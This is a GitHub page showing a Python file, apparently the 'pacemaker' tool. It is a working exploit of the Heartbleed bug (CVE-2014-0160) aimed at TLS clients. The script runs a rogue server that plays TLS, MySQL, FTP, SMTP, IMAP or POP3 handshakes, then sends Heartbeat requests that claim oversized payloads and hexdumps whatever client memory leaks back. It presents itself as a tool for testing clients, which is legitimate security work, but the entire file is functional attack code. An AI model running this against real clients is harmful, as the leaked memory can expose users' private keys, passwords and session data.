Permalink
Switch branches/tags
Nothing to show
Find file Copy path
a49dca2 Jan 20, 2016
2 contributors

Users who have contributed to this file

@Lekensteyn @jwilk
executable file 451 lines (380 sloc) 16.7 KB
#!/usr/bin/env python
# Exploitation of CVE-2014-0160 Heartbeat for the client
# Author: Peter Wu <peter@lekensteyn.nl>
# Licensed under the MIT license <http://opensource.org/licenses/MIT>.
# Python 2.6 compatibility
from __future__ import unicode_literals
try:
import socketserver
except:
import SocketServer as socketserver
import socket
import sys
import struct
import select, time
from argparse import ArgumentParser, ArgumentTypeError
# OpenSSL 1.0.1f buffer size is 4096 (DEFAULT_BUFFER_SIZE), data is flushed in
# buffer_write iff the size of the TLSPlaintext ("fragment") exceeds that
# buffer. So, to reliably get a heartbeat back, the payload length must be at
# least 4097 ("over 4096") - 5 (content type, TLS version, record length) - 3
# (HB type, payload length) - 16 (added padding). Also note that the maximum
# TLSPlaintext length is 0x4000 (SSL3_RT_MAX_PLAIN_LENGTH, enforced via
# max_send_fragment in ssl3_write_bytes).
#
# The returned heartbeat fragment has length 3 + payload length + 16 (type,
# payload length, payload, padding).
MAX_PLAIN_LENGTH = 0x4000


def payload_len(string):
    """Validate a heartbeat payload length given on the command line.

    Intended as an argparse ``type=`` callback. ``string`` may be decimal
    (e.g. ``18``) or prefixed hex (e.g. ``0x12``). Returns the length as an
    int. Raises ArgumentTypeError when the value falls outside the accepted
    range. A warning is printed (but the value is still accepted) when the
    last response record would be too small to be flushed right away.
    """
    # Smallest fragment that still overflows the 4096 byte OpenSSL buffer,
    # not counting the 5 byte record header.
    lower_bound = 4097 - 5
    # 0x10000 minus type (1), payload length (2) and padding (16).
    upper_bound = 0xffed

    # Base 0 lets int() pick decimal or hex from the prefix.
    requested = int(string, 0)
    if requested > upper_bound:
        raise ArgumentTypeError(
            'Payload length must be at most {0} ({0:#x})'.format(upper_bound))
    if requested < lower_bound:
        raise ArgumentTypeError(
            'Payload length must be at least {0} ({0:#x})'.format(lower_bound))

    # Whole response: heartbeat type + payload length field, payload, padding.
    total_response = 3 + requested + 16
    # The response is split in records of MAX_PLAIN_LENGTH bytes; a non-empty
    # trailing record below the buffer size will not be sent out immediately.
    whole_records, trailing = divmod(total_response, MAX_PLAIN_LENGTH)
    if 0 < trailing < lower_bound:
        suggested = MAX_PLAIN_LENGTH * whole_records
        suggested += lower_bound - 3 - 16
        print(('Warning: payload length {0} ({0:#x}) will cause delays, ' +
               'try at least {1} ({1:#x})').format(requested, suggested))
    return requested
# Command line interface; every option is read back through the parsed
# namespace (ipv6, listen, port, client, timeout, skip_server, count,
# payload_len).
parser = ArgumentParser(
    description='Test clients for Heartbleed (CVE-2014-0160)')
parser.add_argument(
    '-6', '--ipv6',
    action='store_true',
    help='Enable IPv6 addresses (implied by IPv6 listen addr. such as ::)')
parser.add_argument(
    '-l', '--listen',
    default='',
    help='Host to listen on (default "%(default)s")')
parser.add_argument(
    '-p', '--port',
    type=int,
    default=4433,
    help='TCP port to listen on (default %(default)d)')
# Note: "ftp" means Explicit FTPS. For Implicit FTPS use "tls".
parser.add_argument(
    '-c', '--client',
    default='tls',
    choices=['tls', 'mysql', 'ftp', 'smtp', 'imap', 'pop3'],
    help='Target client type (default %(default)s)')
parser.add_argument(
    '-t', '--timeout',
    type=int,
    default=3,
    help='Timeout in seconds to wait for a Heartbeat (default %(default)d)')
parser.add_argument(
    '--skip-server',
    default=False,
    action='store_true',
    help='Skip ServerHello, immediately write Heartbeat request')
parser.add_argument(
    '-x', '--count',
    type=int,
    default=1,
    help='Number of Heartbeats requests to be sent (default %(default)d)')
parser.add_argument(
    '-n', '--payload-length',
    type=payload_len,
    default=0xffed,
    dest='payload_len',
    help='Requested payload length including 19 bytes heartbeat type, '
         'payload length and padding (default %(default)#x bytes)')
def make_hello(sslver, cipher):
    """Build a minimal ServerHello record advertising the Heartbeat extension.

    ``sslver`` is the protocol version as a hex string (e.g. ``'03 01'``),
    ``cipher`` an iterable of the two cipher suite byte values to select.
    Returns the complete record as a bytearray.
    """
    # Fixed 32 byte server random.
    server_random = ('52 34 c6 6d 86 8d e8 40 97 da'
                     ' ee 7e 21 c4 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7'
                     ' 95 8c 33 42 3f d5')
    chosen_cipher = ' '.join('{0:02x}'.format(octet) for octet in cipher)
    hex_fields = [
        # Record layer
        '16', sslver,
        '00 31',        # Record length
        # Handshake
        '02 00',
        '00 2d',        # Handshake length
        sslver,
        server_random,
        '00',           # Byte following the random (zero)
        chosen_cipher,
        '00',           # No compression
        '00 05',        # Extensions length
        # Heartbeat extension
        '00 0f',        # Heartbeat type
        '00 01',        # Length
        '01',           # mode
    ]
    return bytearray.fromhex(' '.join(hex_fields).replace('\n', ''))
def make_heartbeat(sslver, payload_len=0xffed):
    """Build a Heartbeat request record that claims ``payload_len`` bytes.

    ``sslver`` is the protocol version as a hex string (e.g. ``'03 01'``).
    The record carries only the 3 byte heartbeat header and no payload at
    all. Returns the record as a bytearray.

    OpenSSL responds with records of length 0x4000, starting with 3 bytes
    (response type, length) and ending with 16 bytes of padding. A payload
    that is too small gets buffered, which causes issues with repeated
    requests; the default therefore fits exactly in four records
    (0x4000 * 4 - 3 - 16 = 0xffed).
    """
    length_high, length_low = divmod(payload_len, 0x100)
    hex_fields = [
        '18', sslver,
        '00 03',    # Length
        '01',       # Type: Request
        '{0:02x} {1:02x}'.format(length_high, length_low),
    ]
    return bytearray.fromhex(' '.join(hex_fields).replace('\n', ''))
def hexdump(data):
    """Print ``data`` as a hex dump, 16 bytes per line.

    Each line shows the offset, the bytes in hex and their printable ASCII
    form ('.' for anything else). Within a run of consecutive all-zero
    lines only the first one is printed; the rest of the run is replaced by
    a single ``*`` line.
    """
    allzeroes = b'\0' * 16
    zerolines = 0
    for i in range(0, len(data), 16):
        line = data[i:i+16]
        # The last line may be shorter than 16 bytes.
        if line == allzeroes[:len(line)]:
            zerolines += 1
            if zerolines == 2:
                print("*")
            if zerolines >= 2:
                continue
        else:
            # A non-zero line ends the run. Without this reset every later
            # zero line would be dropped silently, with no "*" marker.
            zerolines = 0
        # Iterating a bytearray yields ints on both Python 2 and 3.
        octets = bytearray(line)
        print("{0:04x}: {1:47} {2}".format(i,
            ' '.join('{0:02x}'.format(c) for c in octets),
            ''.join(chr(c) if c >= 32 and c < 127 else '.' for c in octets)))
class Failure(Exception):
    """Raised when the peer's behaviour prevents checking for the bug."""
class RecordParser(object):
    """Incremental parser that extracts TLS records from a byte stream.

    Feed received bytes with feed(), ask bytes_needed() how many more bytes
    are required and fetch the parsed record with get_record().
    """

    # Record header in network byte order: content type (1 byte),
    # protocol version (2 bytes), fragment length (2 bytes).
    record_s = struct.Struct(b'!BHH')

    def __init__(self):
        self.buffer = bytearray()
        # Number of bytes currently held in ``buffer``.
        self.buffer_len = 0
        # Parsed header tuple of the record at the start of the buffer.
        self.record_hdr = None

    def feed(self, data):
        """Append newly received bytes to the internal buffer."""
        self.buffer += data
        self.buffer_len = len(self.buffer)

    def get_header(self):
        """Return (type, version, fragment length), or None if incomplete."""
        if self.record_hdr is None and self.buffer_len >= self.record_s.size:
            self.record_hdr = self.record_s.unpack_from(bytes(self.buffer))
        return self.record_hdr

    def bytes_needed(self):
        '''Zero or lower indicates that a fragment is available'''
        expected_len = self.record_s.size
        if self.get_header():
            expected_len += self.record_hdr[2]
        return expected_len - self.buffer_len

    def get_record(self, partial=False):
        """Remove and return the first record as (type, version, fragment).

        Returns None when the header is not complete yet, or when the
        fragment is incomplete and ``partial`` is false. With ``partial``
        set, an incomplete record is returned with whatever part of the
        fragment has been received so far.
        """
        if not self.get_header():
            return None
        record_type, sslver, fragment_len = self.record_hdr
        record_len = self.record_s.size + fragment_len
        if not partial and self.buffer_len < record_len:
            return None
        fragment = self.buffer[self.record_s.size:record_len]
        del self.buffer[:record_len]
        # Resync with the real buffer size: a partial record holds fewer
        # than record_len bytes, so subtracting record_len would leave the
        # counter negative and break bytes_needed() afterwards.
        self.buffer_len = len(self.buffer)
        self.record_hdr = None
        return record_type, sslver, bytes(fragment)
def read_record(sock, timeout, partial=False):
    """Read a single TLS record from ``sock``.

    Waits at most ``timeout`` seconds in total. Returns a tuple
    ``(record, error)``: ``record`` is ``(type, version, fragment)`` or
    None, ``error`` is the exception describing why reading stopped early
    (timeout, socket error, connection closed) or None. With ``partial``
    set, an incompletely received record is returned as far as it was read.
    """
    rparser = RecordParser()
    end_time = time.time() + timeout
    error = None

    bytes_to_read = rparser.bytes_needed()
    while bytes_to_read > 0 and timeout > 0:
        rl, _, _ = select.select([sock], [], [], timeout)
        if not rl:
            error = socket.timeout('Timeout while waiting for bytes')
            break
        try:
            chunk = rl[0].recv(bytes_to_read)
        except socket.error as e:
            error = e
            break  # Connection reset?
        if not chunk:
            # recv() returning no data means the peer closed the connection.
            # select() would report the socket readable again right away,
            # so continuing would busy-loop until the timeout expires.
            error = socket.error('Connection closed by peer')
            break
        rparser.feed(chunk)
        bytes_to_read = rparser.bytes_needed()
        timeout = end_time - time.time()
    return rparser.get_record(partial=partial), error
def read_hb_response(sock, timeout):
    """Collect the payload of a Heartbeat response from ``sock``.

    Reads records for at most ``timeout`` seconds. Returns None if an Alert
    was received and no payload was collected; otherwise returns the
    collected payload as a bytearray, which is empty if nothing usable
    arrived. Raises Failure on a malformed or unexpected record.
    """
    end_time = time.time() + timeout
    memory = bytearray()
    hb_len = 1  # Will be initialized after first heartbeat
    read_error = None
    alert = None

    while len(memory) < hb_len and timeout > 0:
        record, read_error = read_record(sock, timeout, partial=True)
        if not record:
            break

        record_type, _, fragment = record
        if record_type == 24:
            if not memory:  # First Heartbeat
                # Check for enough room for type + len
                if len(fragment) < 3:
                    if read_error:  # Ignore error due to partial read
                        break
                    raise Failure('Response too small')
                # Sanity check, should not happen with OpenSSL
                if fragment[0:1] != b'\2':
                    raise Failure('Expected Heartbeat in first response')
                hb_len, = struct.unpack_from(b'!H', fragment, 1)
                memory += fragment[3:]
            else:  # Heartbeat continuation
                memory += fragment
        elif record_type == 21 and len(fragment) == 2:  # Alert
            alert = fragment
            break
        else:
            # Cannot tell whether vulnerable or not!
            raise Failure('Unexpected record type {0}'.format(record_type))

        timeout = end_time - time.time()

    # Drop heartbeat padding that is included in buffer
    if len(memory) - 16 == hb_len:
        del memory[hb_len:]

    # Check for Alert (sent by NSS)
    if alert:
        # Convert both bytes to ints. A one-byte slice never compares equal
        # to the int 1, which made every alert show up as 'Fatal'.
        lvl, desc = ord(alert[0:1]), ord(alert[1:2])
        lvl = 'Warning' if lvl == 1 else 'Fatal'
        print('Got Alert, level={0}, description={1}'.format(lvl, desc))
        if not memory:
            print('Not vulnerable! (Heartbeats disabled or not OpenSSL)')
            return None

    # Do not print error if we have memory, server could be crashed, etc.
    if read_error and not memory:
        print('Did not receive heartbeat response! ' + str(read_error))

    return memory
class RequestHandler(socketserver.BaseRequestHandler):
    """Handle one client connection: fake a server and send Heartbeats.

    Depending on the selected client type, a plaintext protocol prelude
    (``prepare_<client>``) is played first. Then a ServerHello is sent
    (unless skipped) followed by the configured number of Heartbeat
    requests, whose responses are dumped.
    """

    def handle(self):
        """Entry point called by the server for every accepted connection."""
        self.args = self.server.args
        self.sslver = '03 01'  # default to TLSv1.0
        remote_addr, remote_port = self.request.getpeername()[:2]
        print("Connection from: {0}:{1}".format(remote_addr, remote_port))

        try:
            # Set timeout to prevent hang on clients that send nothing
            self.request.settimeout(2)
            prep_meth = 'prepare_' + self.args.client
            if hasattr(self, prep_meth):
                getattr(self, prep_meth)(self.request)
                print('Pre-TLS stage completed, continuing with handshake')

            if not self.args.skip_server:
                self.do_serverhello()

            for i in range(0, self.args.count):
                try:
                    if not self.do_evil():
                        break
                except socket.error as e:
                    if i == 0:  # First heartbeat?
                        print('Unable to send first heartbeat! ' + str(e))
                    else:
                        print('Unable to send more heartbeats, ' + str(e))
                    break
        except (Failure, socket.error, socket.timeout) as e:
            print('Unable to check for vulnerability: ' + str(e))
        except KeyboardInterrupt:
            # Don't just abort this client, stop the server too
            print('Shutting down...')
            self.server.kill()

        print('')

    def do_serverhello(self):
        """Read the ClientHello and reply with a minimal ServerHello.

        Stores the client's protocol version in ``self.sslver``. Raises
        Failure if the client does not send a usable ClientHello.
        """
        # Read TLS record header
        content_type, ver, rec_len = self.recv_s(b'>BHH', 'TLS record')
        # Check the type before the length: for an SSLv2 hello the bytes
        # parsed as "record length" are not a length at all, so the length
        # check could otherwise hide the more helpful SSL 2.0 message.
        if content_type == 0x80:  # SSLv2 (assume length < 256)
            raise Failure('SSL 2.0 clients cannot be tested')
        self.expect(content_type == 22, 'Expected Handshake type')
        # Session-ID length (1 byte) starts at offset 38
        self.expect(rec_len >= 39, 'Illegal handshake packet')

        # Read handshake; it may arrive in more than one TCP segment.
        hnd = self._recv_exact(self.request, rec_len)
        self.expect(len(hnd) == rec_len, 'Unable to read handshake')
        # Handshake type, 3 byte length (unused), client version
        hnd_type, _, _, ver = struct.unpack(b'>BBHH', hnd[:6])
        self.expect(hnd_type == 1, 'Expected Client Hello')
        # hnd[6:6+32] is Random
        off = 6 + 32
        sid_len, = struct.unpack(b'B', hnd[off:off+1])
        off += 1 + sid_len  # Skip length and SID
        # Enough room for ciphers?
        self.expect(rec_len - off >= 4, 'Illegal handshake packet (2)')
        # Skip the 2 byte cipher suites length, its value is not needed.
        off += 2
        # The first cipher is fine...
        cipher = bytearray(hnd[off:off+2])

        self.sslver = '{0:02x} {1:02x}'.format(ver >> 8, ver & 0xFF)

        # (1) Handshake: ServerHello
        self.request.sendall(make_hello(self.sslver, cipher))
        # (skip Certificate, etc.)

    def do_evil(self):
        '''Returns True if memory *may* be acquired'''
        # (2) HeartbeatRequest
        self.request.sendall(make_heartbeat(self.sslver, self.args.payload_len))

        # (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
        memory = read_hb_response(self.request, self.args.timeout)

        # If memory is None, then it is not vulnerable for sure. Otherwise, if
        # empty, then it *may* be invulnerable
        if not memory:
            if memory is not None:
                print("Possibly not vulnerable")
            return False

        print('Client returned {0} ({0:#x}) bytes'.format(len(memory)))
        hexdump(memory)
        return True

    def expect(self, cond, what):
        """Raise Failure with message ``what`` unless ``cond`` is true."""
        if not cond:
            raise Failure(what)

    def prepare_mysql(self, sock):
        """Send a MySQL server greeting and consume the client's SSLRequest."""
        # This was taken from a MariaDB client. For reference, see
        # https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake
        greeting = u'''
        56 00 00 00 0a 35 2e 35 2e 33 36 2d 4d 61 72 69
        61 44 42 2d 6c 6f 67 00 04 00 00 00 3d 3b 4e 57
        4c 54 44 35 00 ff ff 21 02 00 0f e0 15 00 00 00
        00 00 00 00 00 00 00 7c 36 33 3f 23 2e 5e 6d 2d
        34 5c 54 00 6d 79 73 71 6c 5f 6e 61 74 69 76 65
        5f 70 61 73 73 77 6f 72 64 00
        '''
        sock.sendall(bytearray.fromhex(greeting.replace('\n', '')))
        print("Server Greeting sent.")

        # Little-endian: 3 byte packet length (read as 1 + 2 bytes),
        # sequence id, first two bytes of the capability flags.
        len_low, len_high, seqid, caps = self.recv_s(b'<BHBH', 'MySQL handshake')
        packet_len = (len_high << 8) | len_low
        self.expect(packet_len == 32, 'Expected SSLRequest length == 32')
        self.expect((caps & 0x800), 'Missing Client SSL support')

        print("Skipping {0} packet bytes...".format(packet_len))
        # Skip remainder (minus 2 for caps) to prepare for SSL handshake.
        # Read all of it, leftover bytes would corrupt the TLS parsing.
        self._recv_exact(sock, packet_len - 2)

    def prepare_ftp(self, sock):
        """Greet an FTP client and accept its AUTH SSL / AUTH TLS command."""
        sock.sendall('220 pacemaker test\r\n'.encode('ascii'))
        data = sock.recv(16).decode('ascii').strip()
        self.expect(data in ('AUTH SSL', 'AUTH TLS'),
                    'Unexpected response: ' + data)
        sock.sendall(bytearray('234 ' + data + '\r\n', 'ascii'))

    def prepare_pop3(self, sock):
        """Play the POP3 dialogue up to and including STLS."""
        self.do_conversation('+OK pacemaker ready\r\n', [
            ('CAPA', '+OK\r\nSTLS\r\n.\r\n'),
            ('STLS', '+OK\r\n')
        ])

    def prepare_smtp(self, sock):
        """Play the SMTP dialogue up to and including STARTTLS."""
        self.do_conversation('220 pacemaker test\r\n', [
            ('EHLO ', '250-example.com Hi!\r\n250 STARTTLS\r\n'),
            ('STARTTLS', '220 Go ahead\r\n')
        ])

    def prepare_imap(self, sock):
        """Play the IMAP dialogue up to and including STARTTLS."""
        caps = 'CAPABILITY IMAP4rev1 STARTTLS'
        talk = [
            ('CAPABILITY', '* ' + caps + '\r\n'),
            ('STARTTLS', '')
        ]
        sock.sendall(('* OK [' + caps + '] ready\r\n').encode('ascii'))
        for exp, resp in talk:
            data = sock.recv(256).decode('ascii').upper()
            self.expect(' ' in data, 'IMAP protocol violation, got ' + data)
            # Split off the tag only. Splitting more than once would yield
            # three parts for commands containing another space and fail
            # the unpacking with a ValueError.
            tag, data = data.split(' ', 1)
            self.expect(data[:len(exp)] == exp,
                        'Expected ' + exp + ', got ' + data)
            # Every reply ends with the tagged completion result.
            resp += tag + ' OK\r\n'
            sock.sendall(resp.encode('ascii'))

    def do_conversation(self, greeting, talk):
        '''Helper to handle simple request-response protocols.'''
        self.request.sendall(greeting.encode('ascii'))
        for exp, resp in talk:
            data = self.request.recv(256).decode('ascii').upper()
            self.expect(data[:len(exp)] == exp,
                        'Expected ' + exp + ', got ' + data)
            self.request.sendall(resp.encode('ascii'))

    def recv_s(self, struct_def, what):
        """Receive and unpack the struct described by ``struct_def``.

        ``what`` names the data in the Failure raised when the connection
        ends before the complete struct has been received.
        """
        s = struct.Struct(struct_def)
        data = self._recv_exact(self.request, s.size)
        msg = '{0}: received only {1}/{2} bytes'.format(what, len(data), s.size)
        self.expect(len(data) == s.size, msg)
        return s.unpack(data)

    def _recv_exact(self, sock, size):
        """Receive ``size`` bytes from ``sock``, fewer only on end of stream.

        A single recv() may return less than requested, so keep reading
        until everything has arrived or the peer closes the connection.
        """
        data = bytearray()
        while len(data) < size:
            chunk = sock.recv(size - len(data))
            if not chunk:
                break  # Connection closed, return what has been received
            data += chunk
        return bytes(data)
class PacemakerServer(socketserver.TCPServer):
    """TCP server handing every connection to RequestHandler.

    The parsed command line arguments are kept in ``args`` for the request
    handlers. The serving loop can be ended with kill().
    """

    def __init__(self, args):
        # Both settings are assigned before the base initializer runs.
        self.allow_reuse_address = True
        wants_ipv6 = args.ipv6 or ':' in args.listen
        if wants_ipv6:
            self.address_family = socket.AF_INET6
        socketserver.TCPServer.__init__(
            self, (args.listen, args.port), RequestHandler)
        self.args = args

    def serve_forever(self):
        """Handle requests one at a time until kill() has been called."""
        self.stopped = False
        while True:
            self.handle_request()
            if self.stopped:
                break

    def kill(self):
        """Make serve_forever() return after the current request."""
        self.stopped = True
def serve(args):
    """Start the test server with the parsed command line ``args``.

    Blocks until the server is stopped. The listening socket is closed on
    the way out, also when the loop is left through an exception such as
    KeyboardInterrupt.
    """
    print('Listening on {0}:{1} for {2} clients'
          .format(args.listen, args.port, args.client))
    server = PacemakerServer(args)
    try:
        server.serve_forever()
    finally:
        # Release the listening socket explicitly.
        server.server_close()
if __name__ == '__main__':
    # Parse the options before starting the server.
    args = parser.parse_args()
    try:
        serve(args)
    except KeyboardInterrupt:
        # Interrupting the server is not an error, exit without traceback.
        pass